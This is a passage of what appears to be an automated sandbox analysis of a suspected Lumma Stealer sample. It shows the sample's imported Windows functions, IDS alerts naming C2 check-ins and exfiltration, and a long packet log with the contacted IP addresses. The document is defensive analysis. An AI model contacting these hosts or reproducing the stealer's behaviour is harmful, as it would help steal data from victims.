                                                                                                                                      RT_DIALOG0x1203b80x100dataEnglishUnited States0.5234375
                                                                                                                                      RT_DIALOG0x1204b80x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                      RT_DIALOG0x1205d40x60dataEnglishUnited States0.7291666666666666
                                                                                                                                      RT_GROUP_ICON0x1206340x3edata0.8709677419354839
                                                                                                                                      RT_GROUP_ICON0x1206740x22dataEnglishUnited States0.9705882352941176
                                                                                                                                      RT_VERSION0x1206980x300dataEnglishUnited States0.46484375
                                                                                                                                      RT_MANIFEST0x1209980x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                      Imports

                                                                                                                                      DLLImport
                                                                                                                                      KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                      USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                      SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                      ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                      VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                      Possible Origin

                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                      EnglishUnited States

                                                                                                                                      Network Behavior

                                                                                                                                      Suricata IDS Alerts

                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                      2024-12-27T10:21:25.561664+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.94.92443TCP
                                                                                                                                      2024-12-27T10:21:29.417050+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449733104.21.94.92443TCP
                                                                                                                                      2024-12-27T10:21:29.417050+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733104.21.94.92443TCP
                                                                                                                                      2024-12-27T10:21:30.682504+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.94.92443TCP
                                                                                                                                      2024-12-27T10:21:33.528237+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449737104.21.94.92443TCP
                                                                                                                                      2024-12-27T10:21:33.528237+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737104.21.94.92443TCP
                                                                                                                                      2024-12-27T10:21:35.030514+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.94.92443TCP
                                                                                                                                      2024-12-27T10:21:37.289098+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.94.92443TCP
                                                                                                                                      2024-12-27T10:21:39.456880+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.94.92443TCP
                                                                                                                                      2024-12-27T10:21:41.870553+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.94.92443TCP
                                                                                                                                      2024-12-27T10:21:43.903017+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.94.92443TCP
                                                                                                                                      2024-12-27T10:21:44.701886+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449742104.21.94.92443TCP
                                                                                                                                      2024-12-27T10:21:45.964411+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.94.92443TCP
                                                                                                                                      2024-12-27T10:21:46.738072+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449743104.21.94.92443TCP
                                                                                                                                      2024-12-27T10:21:48.855903+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744185.161.251.21443TCP
                                                                                                                                      2024-12-27T10:21:50.970420+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745172.67.214.186443TCP
                                                                                                                                      2024-12-27T10:21:51.853713+01002008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File1172.67.214.186443192.168.2.449745TCP

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Dec 27, 2024 10:21:24.250905991 CET49733443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:24.250931978 CET44349733104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:24.251017094 CET49733443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:24.253567934 CET49733443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:24.253578901 CET44349733104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:25.561580896 CET44349733104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:25.561664104 CET49733443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:25.564209938 CET49733443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:25.564218998 CET44349733104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:25.564425945 CET44349733104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:25.605101109 CET49733443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:25.612447977 CET49733443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:25.612461090 CET49733443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:25.612531900 CET44349733104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:29.416995049 CET44349733104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:29.417072058 CET44349733104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:29.417123079 CET49733443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:29.419068098 CET49733443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:29.419080019 CET44349733104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:29.426209927 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:29.426306963 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:29.426408052 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:29.426743031 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:29.426783085 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:30.682338953 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:30.682503939 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:30.683787107 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:30.683809996 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:30.684031963 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:30.692522049 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:30.692522049 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:30.692591906 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.528220892 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.528260946 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.528287888 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.528316021 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.528341055 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.528340101 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:33.528397083 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.528429985 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:33.528599977 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:33.536317110 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.544629097 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.544681072 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:33.544703960 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.552848101 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.552906036 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:33.552922964 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.605115891 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:33.605134964 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.651961088 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:33.729053974 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.732944012 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.733020067 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:33.733050108 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.740689039 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.740746975 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:33.740762949 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.740783930 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.740849018 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:33.740930080 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:33.740971088 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.740998030 CET49737443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:33.741017103 CET44349737104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.819881916 CET49738443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:33.819920063 CET44349738104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:33.819987059 CET49738443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:33.820427895 CET49738443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:33.820441961 CET44349738104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:35.030421972 CET44349738104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:35.030514002 CET49738443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:35.031712055 CET49738443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:35.031717062 CET44349738104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:35.031917095 CET44349738104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:35.038605928 CET49738443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:35.038733959 CET49738443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:35.038755894 CET44349738104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:35.038830996 CET49738443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:35.038835049 CET44349738104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:36.013175011 CET44349738104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:36.013252020 CET44349738104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:36.013298988 CET49738443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:36.013470888 CET49738443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:36.013480902 CET44349738104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:36.031552076 CET49739443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:36.031634092 CET44349739104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:36.031742096 CET49739443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:36.032048941 CET49739443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:36.032085896 CET44349739104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:37.288986921 CET44349739104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:37.289098024 CET49739443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:37.290257931 CET49739443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:37.290287971 CET44349739104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:37.290513039 CET44349739104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:37.291640043 CET49739443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:37.291764975 CET49739443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:37.291806936 CET44349739104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:38.178240061 CET44349739104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:38.178309917 CET44349739104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:38.178386927 CET49739443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:38.178591967 CET49739443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:38.178637028 CET44349739104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:38.245678902 CET49740443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:38.245724916 CET44349740104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:38.245804071 CET49740443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:38.246081114 CET49740443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:38.246097088 CET44349740104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:39.456818104 CET44349740104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:39.456880093 CET49740443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:39.458280087 CET49740443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:39.458296061 CET44349740104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:39.458499908 CET44349740104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:39.459727049 CET49740443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:39.459856033 CET49740443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:39.459889889 CET44349740104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:39.459937096 CET49740443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:39.459944010 CET44349740104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:40.413647890 CET44349740104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:40.413722992 CET44349740104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:40.413779974 CET49740443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:40.413958073 CET49740443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:40.413978100 CET44349740104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:40.566524982 CET49741443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:40.566562891 CET44349741104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:40.566631079 CET49741443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:40.566915035 CET49741443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:40.566926956 CET44349741104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:41.870474100 CET44349741104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:41.870553017 CET49741443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:41.886581898 CET49741443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:41.886598110 CET44349741104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:41.886790991 CET44349741104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:41.888003111 CET49741443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:41.888101101 CET49741443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:41.888106108 CET44349741104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:42.652683973 CET44349741104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:42.652776003 CET44349741104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:42.652841091 CET49741443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:42.652972937 CET49741443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:42.652992964 CET44349741104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:42.691005945 CET49742443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:42.691046000 CET44349742104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:42.691220999 CET49742443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:42.691471100 CET49742443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:42.691487074 CET44349742104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:43.902946949 CET44349742104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:43.903017044 CET49742443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:43.904333115 CET49742443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:43.904345036 CET44349742104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:43.904666901 CET44349742104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:43.905829906 CET49742443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:43.905921936 CET49742443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:43.905927896 CET44349742104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:44.701849937 CET44349742104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:44.701961040 CET44349742104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:44.702034950 CET49742443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:44.702188969 CET49742443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:44.702207088 CET44349742104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:44.704998016 CET49743443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:44.705040932 CET44349743104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:44.705120087 CET49743443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:44.705385923 CET49743443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:44.705396891 CET44349743104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:45.964121103 CET44349743104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:45.964411020 CET49743443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:45.967869997 CET49743443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:45.967879057 CET44349743104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:45.968200922 CET44349743104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:45.969367027 CET49743443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:45.969398975 CET49743443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:45.969445944 CET44349743104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:46.738079071 CET44349743104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:46.738214970 CET44349743104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:46.738375902 CET49743443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:46.738404989 CET49743443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:46.738420963 CET44349743104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:46.738432884 CET49743443192.168.2.4104.21.94.92
                                                                                                                                      Dec 27, 2024 10:21:46.738441944 CET44349743104.21.94.92192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:47.216124058 CET49744443192.168.2.4185.161.251.21
                                                                                                                                      Dec 27, 2024 10:21:47.216155052 CET44349744185.161.251.21192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:47.216234922 CET49744443192.168.2.4185.161.251.21
                                                                                                                                      Dec 27, 2024 10:21:47.216562986 CET49744443192.168.2.4185.161.251.21
                                                                                                                                      Dec 27, 2024 10:21:47.216574907 CET44349744185.161.251.21192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:48.855822086 CET44349744185.161.251.21192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:48.855902910 CET49744443192.168.2.4185.161.251.21
                                                                                                                                      Dec 27, 2024 10:21:48.857394934 CET49744443192.168.2.4185.161.251.21
                                                                                                                                      Dec 27, 2024 10:21:48.857405901 CET44349744185.161.251.21192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:48.857731104 CET44349744185.161.251.21192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:48.858814001 CET49744443192.168.2.4185.161.251.21
                                                                                                                                      Dec 27, 2024 10:21:48.899373055 CET44349744185.161.251.21192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:49.377362967 CET44349744185.161.251.21192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:49.377444029 CET44349744185.161.251.21192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:49.377604008 CET49744443192.168.2.4185.161.251.21
                                                                                                                                      Dec 27, 2024 10:21:49.377684116 CET49744443192.168.2.4185.161.251.21
                                                                                                                                      Dec 27, 2024 10:21:49.377695084 CET44349744185.161.251.21192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:49.377706051 CET49744443192.168.2.4185.161.251.21
                                                                                                                                      Dec 27, 2024 10:21:49.377711058 CET44349744185.161.251.21192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:49.708199978 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:49.708312035 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:49.708403111 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:49.708705902 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:49.708744049 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:50.970350027 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:50.970419884 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:50.977710962 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:50.977737904 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:50.977972984 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:50.979113102 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.023340940 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.570466042 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.570502996 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.570524931 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.570560932 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.570564032 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.570605040 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.570657015 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.570667028 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.570679903 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.570724010 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.586956024 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.587042093 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.587102890 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.587124109 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.588140011 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.595330000 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.636363983 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.689951897 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.730108023 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.772236109 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.775966883 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.776113033 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.776140928 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.783689022 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.783750057 CET49745443192.168.2.4172.67.214.186
